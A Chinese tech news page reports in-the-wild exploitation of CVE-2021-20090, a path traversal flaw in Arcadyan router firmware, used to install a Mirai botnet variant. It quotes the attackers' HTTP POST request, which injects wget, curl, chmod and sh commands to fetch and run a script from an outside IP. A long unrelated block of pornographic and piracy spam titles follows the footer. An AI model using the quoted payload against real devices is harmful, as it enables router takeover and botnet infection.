《電子技術(shù)應(yīng)用》
您所在的位置:首頁 > 通信與網(wǎng)絡(luò) > 業(yè)界動(dòng)態(tài) > 9.9分漏洞在野利用

9.9分漏洞在野利用

2021-08-21
來源:嘶吼專業(yè)版
關(guān)鍵詞: 9.9分漏洞 路由器

  研究人員發(fā)現(xiàn)9.9分漏洞在野利用,數(shù)百萬路由器設(shè)備受到影響。

  CVE-2021-20090漏洞

  CVE-2021-20090漏洞是Tenable研究人員8月3日公開的包含Arcadyan固件的路由器web接口路徑遍歷漏洞,CVSS評(píng)分9.9分。漏洞影響數(shù)百萬家用路由器設(shè)備和其他使用有漏洞的代碼庫的物聯(lián)網(wǎng)設(shè)備,包括部分互聯(lián)網(wǎng)服務(wù)提供商在內(nèi)的不少于17家廠商的產(chǎn)品受到影響。

  CVE-2021-20090漏洞是一個(gè)路徑遍歷漏洞,可能引發(fā)認(rèn)證繞過。成功利用該漏洞后,攻擊者可以完全接管有漏洞的設(shè)備。比如,Tenable研究人員已經(jīng)證明了如何在有漏洞的路由器上修改配置以啟用Telnet,并獲取訪問設(shè)備的root級(jí)shell訪問權(quán)限。

  cve-2021-20090漏洞的技術(shù)細(xì)節(jié)參見:

  https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2

  在野漏洞利用

  Juniper安全研究人員在監(jiān)控一起惡意網(wǎng)絡(luò)活動(dòng)流量時(shí)發(fā)現(xiàn)嘗試?yán)迷撀┒吹墓裟J健9粽呖此茋L試在受影響的路由器上使用腳本的方式來部署Mirai惡意軟件變種。

  研究人員從今年2月18日開始監(jiān)控到該攻擊活動(dòng),原始的攻擊來源與IP地址27.22.80[.]19,通過HTTP POST方法:

  POST /images/%2fapply_abstract.cgi HTTP/1.1

  Connection: close

  User-Agent: Darkaction=start_ping&submit_button=ping.html&action_params=blink_time%3D5&ARC_ping_ipaddress=212.192.241.7%0A

  wget+http://212.192.241.72/lolol.sh;

  curl+-O+http://212.192.241.72/lolol.sh;

  chmod+777+lolol.sh;

  sh+lolol.sh&ARC_ping_status=0&TMP_Ping_Type=4

  從該P(yáng)OST 請求中可以看出,攻擊者修改了被攻擊設(shè)備的配置信息使用“ARC_SYS_TelnetdEnable=1”來啟用Telnet,然后使用wget或curl從IP 地址212.192.241[.]72 處下載一個(gè)新的腳本,然后執(zhí)行。研究人員分析該腳本payload并確認(rèn)是Mirai僵尸網(wǎng)絡(luò)變種。

  從6月6日到7月23日,研究人員發(fā)現(xiàn)攻擊者開始利用其它的漏洞:

  CVE-2020-29557 (DLink路由器)

  CVE-2021-1497 and CVE-2021-1498 (Cisco HyperFlex)

  CVE-2021-31755  (Tenda AC11)

  CVE-2021-22502 (MicroFocus OBR)

  CVE-2021-22506 (MicroFocus AM)

  這表明該攻擊組織正通過添加新的漏洞利用不斷擴(kuò)展其攻擊活動(dòng)。




電子技術(shù)圖片.png

本站內(nèi)容除特別聲明的原創(chuàng)文章之外,轉(zhuǎn)載內(nèi)容只為傳遞更多信息,并不代表本網(wǎng)站贊同其觀點(diǎn)。轉(zhuǎn)載的所有的文章、圖片、音/視頻文件等資料的版權(quán)歸版權(quán)所有權(quán)人所有。本站采用的非本站原創(chuàng)文章及圖片等內(nèi)容無法一一聯(lián)系確認(rèn)版權(quán)者。如涉及作品內(nèi)容、版權(quán)和其它問題,請及時(shí)通過電子郵件或電話通知我們,以便迅速采取適當(dāng)措施,避免給雙方造成不必要的經(jīng)濟(jì)損失。聯(lián)系電話:010-82306118;郵箱:aet@chinaaet.com。
主站蜘蛛池模板: 亚洲另类小说图片| 国产乱人伦偷精品视频不卡| 三级免费黄录像| 有人有看片的资源吗www在线观看| 免费在线观看视频| 边吸奶边扎下面| 国产精品国产三级国产普通话 | 国产精品久久久久久亚洲影视| yy6080新视觉午夜伦被窝 | 日韩一区二区三| 亚洲大尺度无码无码专区| 第九色区AV天堂| 国产一级视频在线观看网站| 亚洲h在线观看| 夜夜燥天天燥2022| 三级网站免费观看| 日韩一区二区三| 亚洲人成网站18禁止久久影院| 王雨纯脱得一点不剩| 四虎免费在线观看| 青青青国产精品视频| 国产福利一区二区三区在线观看| 99re在线视频免费观看| 少妇丰满爆乳被呻吟进入| 久久久这里有精品999| 最近的中文字幕国语电影直播| 亚洲精品视频免费在线观看| 精品福利三区3d卡通动漫| 国产乱码卡一卡2卡三卡四| videos性欧美| 国产高清乱理论片在线看| lover视频无删减免费观看| 成人黄色免费网址| 久久久精品人妻一区亚美研究所| 极品馒头一线天粉嫩| 亚洲成人福利在线| 激情综合色五月六月婷婷| 免费视频爱爱太爽了| 色综合天天综合中文网| 国产在线观看精品一区二区三区91| 中文字幕在线观看你懂的|